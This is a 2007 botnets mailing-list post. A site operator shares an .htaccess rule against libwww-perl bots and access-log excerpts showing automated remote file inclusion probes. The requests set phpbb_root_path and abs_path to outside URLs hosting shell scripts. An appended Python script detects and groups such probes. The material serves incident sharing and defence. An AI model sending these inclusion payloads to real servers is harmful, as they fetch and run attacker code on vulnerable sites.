To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Hi all;
I don't know if this will help anyone track these; I can't really make
too much sense of the log.

I implemented a .htaccess rule to 301 redirect libwww-perl etc. to
google.com:

# Redirect libwww-perl clients; R=301 yields the 301 status seen in the log
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl.*$ [NC]
RewriteRule .* http://www.google.com/ [R=301,L]

and so they came...

Here are some examples from the current access.log file

megan.netlogistics.com.au - - [08/Sep/2007:07:27:52 +1000] "GET
/index.php?
phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1"
301 208 "-" "libwww-perl/5.808"

(This is the only one I contacted, and they sent back an email from
[EMAIL PROTECTED],
the contents of which are:
Hi,

We will investigate this issue. In the meantime can you please
provide us your IP address so we can block all traffic to
your address so that you are not affected by this.
Regards,

Tarinder Singh, Systems Administrator
Net Logistics Pty. Ltd.
http://www.netlogistics.com.au

)

193.138.206.192 - - [08/Sep/2007:07:30:20 +1000] "GET
/faq.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt??
HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
...

b2.d7.344a.static.theplanet.com - - [10/Sep/2007:18:16:11 +1000] "GET
//phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar
ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
dime54.dizinc.com - - [10/Sep/2007:18:17:06 +1000] "GET
//phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar
ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
ik80.ikexpress.com - - [10/Sep/2007:18:18:17 +1000] "GET
//phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar
ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
mistral.lublin.pl - - [10/Sep/2007:18:33:15 +1000] "GET
//phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar
ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.803"
...

p1w33.geo.scd.hostingprod.com - - [10/Sep/2007:20:08:57 +1000] "GET
/initiate.php?abs_path=http://ofskroz.somee.com/1337/perls/id.txt?
HTTP/1.1" 301 208 "-" "libwww-perl/5.803"
p1w33.geo.scd.hostingprod.com - - [10/Sep/2007:20:36:15 +1000] "GET
/m32forum/%3Cwbr%20/%3Eshowtopic.php?threadid=62&time=/initiate.ph
p?abs_path=http://ofskroz.somee.com/1337/perls/id.txt? HTTP/1.1" 301
208 "-" "libwww-perl/5.803"
...
vps.websitedepot.com - - [20/Sep/2007:06:51:05 +1000] "GET
/playlist.php?phpbb_root_path=http://www.tukangbecak.com/ban.gif?
HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
...
megan.netlogistics.com.au - - [20/Sep/2007:07:09:49 +1000] "GET
/faq.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt??
HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
business-media.info - - [20/Sep/2007:07:14:32 +1000] "GET
/faq.php?phpbb_root_path=http://sapikeren.net/yogya-carder/indonesia/T
hemes/nebula/temp? HTTP/1.1" 301 208 "-" "libwww-perl/5.69"
pass22.dizinc.com - - [20/Sep/2007:07:23:49 +1000] "GET
/playlist.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbul
l.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
ns7.xenserve.com - - [20/Sep/2007:07:30:18 +1000] "GET
/faq.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.tx
t? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
srv24.icx.pl - - [20/Sep/2007:07:41:28 +1000] "GET
/playlist.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/sa
fe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
hostman.pl - - [20/Sep/2007:07:50:10 +1000] "GET
/index.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.t
xt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
srv24.icx.pl - - [20/Sep/2007:08:03:39 +1000] "GET
/index.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.
txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
202.60.80.10 - - [20/Sep/2007:08:19:27 +1000] "GET
/song.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt??
HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
r118126.ppp.asahi-net.or.jp - - [20/Sep/2007:08:28:05 +1000] "GET
/faq.php?phpbb_root_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1"
301 208 "-" "libwww-perl/5.79"
...
r118126.ppp.asahi-net.or.jp - - [20/Sep/2007:08:46:10 +1000] "GET
/song.php?phpbb_root_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1"
301 208 "-" "libwww-perl/5.79"
hostman.pl - - [20/Sep/2007:08:48:32 +1000] "GET
/faq.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt
? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
69.57.190.194 - - [20/Sep/2007:09:01:52 +1000] "GET
/index.php?phpbb_root_path=http://coyoteco.iespana.es/cmd.txt?
HTTP/1.1" 301 208 "-" "libwww-perl/5.79"
srv24.icx.pl - - [20/Sep/2007:09:12:33 +1000] "GET
/song.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.t
xt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"

-----------------------------------------------
Dave Arrowsmith http://www.4tfingers.biz/
   / _|_______
  / .\__   __/
 / /| |_| |
/___   __||
    |_| |_|
PO Box 111, Bogangar, NSW, 2488, Australia. 
Friends may come and go, but enemies accumulate.


_______________________________________________
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
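
One way to make sense of entries like the ones in the post, as an added example that is not part of the original message: it parses Apache combined-format lines, flags requests where a query parameter carries a remote URL, and groups the requesting hosts by the server the payload is fetched from. The function names are hypothetical; sample entries 1-4 are taken from the post with the mail line-wrapping undone, and entry 5 is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Apache combined format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$')
# A parameter whose value is itself a remote URL marks a remote file inclusion probe.
REMOTE_RE = re.compile(r'[?&](?P<param>[\w\[\]]+)=(?P<url>(?:https?|ftp)://[^&\s]+)', re.I)

# Entries 1-4: from the post, line-wrapping undone. Entry 5: constructed benign request.
SAMPLE = [
    'megan.netlogistics.com.au - - [08/Sep/2007:07:27:52 +1000] "GET /index.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"',
    'b2.d7.344a.static.theplanet.com - - [10/Sep/2007:18:16:11 +1000] "GET //phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"',
    'p1w33.geo.scd.hostingprod.com - - [10/Sep/2007:20:36:15 +1000] "GET /m32forum/%3Cwbr%20/%3Eshowtopic.php?threadid=62&time=/initiate.php?abs_path=http://ofskroz.somee.com/1337/perls/id.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.803"',
    'srv24.icx.pl - - [20/Sep/2007:07:41:28 +1000] "GET /playlist.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"',
    '192.0.2.10 - - [20/Sep/2007:09:15:00 +1000] "GET /faq.php?mode=bbcode HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def parse_probe(line):
    """Return a dict describing the inclusion probe in one log line, or None."""
    entry = LOG_RE.match(line.strip())
    if not entry:
        return None
    hit = REMOTE_RE.search(entry['target'])
    if not hit:
        return None
    # The trailing '?' makes any suffix the target script appends part of a query string.
    url = hit['url'].rstrip('?')
    return {'src': entry['src'], 'param': hit['param'], 'payload': url,
            'payload_host': urlsplit(url).hostname, 'agent': entry['agent']}

def summarise(lines):
    """Map each payload host to the sorted list of distinct sources requesting it."""
    sources = defaultdict(set)
    for probe in filter(None, map(parse_probe, lines)):
        sources[probe['payload_host']].add(probe['src'])
    return {host: sorted(srcs) for host, srcs in sources.items()}

if __name__ == '__main__':
    for host, srcs in summarise(SAMPLE).items():
        print(f'{host}: {len(srcs)} source(s): {", ".join(srcs)}')
```

Grouping by payload host shows which requesting machines are working from the same include URL, which the per-line view of the log hides.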
